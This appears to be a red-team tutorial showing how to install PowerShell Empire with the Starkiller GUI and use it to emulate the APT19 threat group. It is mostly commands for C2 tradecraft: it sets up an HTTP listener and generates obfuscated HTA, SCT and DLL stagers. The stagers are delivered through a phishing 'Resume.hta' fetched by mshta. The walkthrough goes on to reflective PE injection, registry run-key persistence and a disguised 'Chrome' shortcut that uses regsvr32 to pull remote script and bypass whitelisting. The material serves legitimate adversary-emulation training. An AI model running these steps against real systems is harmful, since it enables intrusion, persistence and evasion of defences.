Demo of Empire with Starkiller is in this Red Team Village event video where I emulate APT19:
Install on Kali:
sudo apt install powershell-empire
Install on Ubuntu:
cd /optsudo git clone https://github.com/BC-SECURITY/Empire.gitcd Empiresudo ./setup/install.sh
Download Starkiller if you want a GUI:
cd /optsudo wget https://github.com/BC-SECURITY/Starkiller/releases/download/v1.0.0/starkiller-1.0.0.AppImagesudo chmod +x starkiller-1.0.0.AppImage
sudo empire
On Kali:
sudo powershell-empire
Run Empire for connectivity through Starkiller if you want a GUI:
sudo empire --rest --username <user> --password <password>
Open Starkiller:
cd /opt/starkiller./starkiller-1.2.2.AppImage
Login to Starkiller:
Name: localhost:1337
Username: <user>
Password: <password>
Will use an adversary emulation plan for APT19 as an example: https://www.scythe.io/library/threatthursday-apt19​
Tactic | Description |
Description | APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. |
Goal and Intent | Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. |
Command and Control | Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server |
Initial Access | Spearphishing attachment (T1193); Spearphishing link (T1192) |
Execution | PowerShell (T1086); User Execution; Hidden Windows (T1143) - used |
Discover | System Owner/User Discovery (T1033); System Information Discovery (T1082) System Network Configuration Discovery (T1016) |
Persistence | Registry Run Keys/ Start up Folder (T1060) - establishes persistence by setting the Registry key |
Defense Evasion | Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques |
Create Listener
Type: httpName: httpHost: http://10.0.0.187Port: 80BindIP: 10.0.0.187Jitter: 0.5StagingKey: georgy
Generate Stager HTA:
Type: windows/htaListner: httpBase64: TrueLanguage: powershellOutfile: /tmp/Resume.hta
Generate Stager SCT:
Type: windows/launcher_sctListner: httpBase64: TrueLanguage: powershell
Generate Stager DLL:
Type: windows/dllListner: httpArch: x86Language: powershellOutFile: /tmp/launcher.dll​Optional FieldsObfuscate: TrueObfuscateCommand: Token\String\1
Download the stagers to /tmp and serve with SimpleHTTPServer
cd /tmppython -m SimpleHTTPServer 8080
Email with link to Resume.hta
Show execution of HTA file:
mshta http://10.0.0.187:8080/Resume.hta
Migrate to another process with reflective PE Injection: https://www.bc-security.org/post/reflective-pe-injection-in-windows-10-1909/​
See processes running: psusemodule code_execution/invoke_reflectivepeinjectionset ProcID: <processID>set DllPath: /tmp/launcher.dll
whoamiusemodule situational_awareness/host/antivirusproductusemodule situational_awareness/host/get_uaclevelusemodule situational_awareness/host/winenum
usemodule persistence/userland/registryset Listener: http
Open regedit HKCU\Software\Microsoft\Windows\CurrentVersion
Execution with regsvr32 and scripting. Created a shortcut called Chrome with Target set as:
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\regsvr32.exe /s /n /u /i:http:\10.0.0.187:8080\launcher.sct scrobj.dll"
cd C:\Users\<username>upload /tmp/fileshell C:\Users\<username>\<executable>
Using Empire with Starkiller: How to from BC-Security​